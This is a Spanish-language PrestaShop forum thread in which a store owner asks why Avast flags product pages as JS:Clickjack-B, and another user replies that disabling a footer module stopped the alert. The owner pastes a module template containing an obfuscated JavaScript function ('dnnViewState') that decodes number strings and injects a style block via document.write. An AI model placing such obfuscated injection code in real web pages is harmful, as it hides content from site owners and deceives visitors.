Jump to content

Trojano ---> JS:Clickjack-B


rodrigoquai

Recommended Posts

Hola Amigos,

 

tengo la siguiente situación, resulta que nuestra pagina web al parecer tiene un troyano, esto sucede cuando se ingresa a una descripción del producto.

 

este troyano fue detectado por los antivirus Avast , adjunto link

 

http://www.avast.com/es-cl/lp-fr-virus-alert?p_ext=&utm_campaign=Virus_alert&utm_source=prg_fav_80_0&utm_medium=prg_systray&utm_content=.%2Ffa%2Fes-cl%2Fvirus-alert-default&p_vir=JS:Clickjack-B%20%5bTrj%5d&p_prc=C:\Program%20Files%20(x86)\Google\Chrome\Application\chrome.exe&p_obj=http://www.musicworld.cl/product.php?id_product=329&p_var=.%2Ffa%2Fes-cl%2Fvirus-alert-default&p_elm=7&p_lex=332&p_lid=es-cl&p_lng=es&p_lqa=0&p_lqe=0&p_lst=0&p_lsu=24&p_pro=0&p_vep=8&p_ves=0&p_vbd=1489&p_hid=0e55d2da-40ef-41b9-83e2-362061a783c1

 

revisando a que se debía este problema llegue a esta URL donde hablaban de este troyano

 

http://blog.gwebtools.com/how-to-remove-jsclickjack-a-trj-from-my-website/

 

donde hablan del código malicioso y como eliminarlo

 

hasta hay todo bien, pues pensaba que me habían hackeado y que me habían incrustado código a mi pagina web. por lo tanto como soy precavido tenia varios respaldo del sitio y procedí a restaurarlo. pero el problema seguía. entonces seguí leyendo y llegue a una web donde decía que después de actualizar avast detectaba este troyano, cabe destacar que en otro antivirus como karpesky no detecta este código.

 

empece a comparar códigos y no había ninguna modificación. me pareció muy raro por lo cual

me dedique a buscar el codigo en la pagina web y lo encontré en un modulo específicamente en el modulo Lof Social Share Module v1.0.0 , al desactivarlo el mensaje de troyano desapareció.

 

entonces mi consulta es : esto que pasa es un troyano efectivamente ? alguien sabe que puede suceder, dejo el código que tiene el módulo

 

/modules/lofsocial/tmpl/basic/default.tpl

 

/themes/leo_hitech/modules/lofsocial/tmplbasic/default.tpl

 

debo decir que nuestra versión de prestashop es PrestaShop™ 1.4.9.0

 

por que este codigo es detectado como troyano por avast.

 

 

<!--Start Module-->

<div class="socialshare">

<div>

<strong style="float: left; margin: 5px;">Compartir:</strong>

<script language="JavaScript">

function dnnViewState()

{ldelim}

var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','778787','949990793917947998942577939317'),l=x.length;while(++a<=l)

{ldelim}

m=x[l-a];

t=z='';

for(v=0;v<m.length;)

{ldelim}

t+=m.charAt(v++);

if(t.length==2)

{ldelim}

z+=String.fromCharCode(parseInt(t)+25-l+a);

t='';

{rdelim}

{rdelim}

x[l-a]=z;

{rdelim}

document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{ldelim}'+x[1]+'{rdelim}</'+x[0]+'>');

{rdelim}

dnnViewState();

</script>

 

{$data}

<div class="clearfix clr"></div>

<br />

<!--Add Script-->

<!--End Module-->

</div>

</div>

 

 

saludos y muchas Gracias por sus opiniones y/o Respuestas

Link to comment
Share on other sites

desactiva el modulo que mencione Lof Social Share Module v1.0.0 si es que lo tienes

 

si tengo ese modulo pero no es el que me hace saltar el antivirus avast, he tenido que desactivar Lof Advance Footer Module y se solucionó.

 

Gracias

Link to comment
Share on other sites

  • 2 months later...
Guest
This topic is now closed to further replies.
×
×
  • Create New...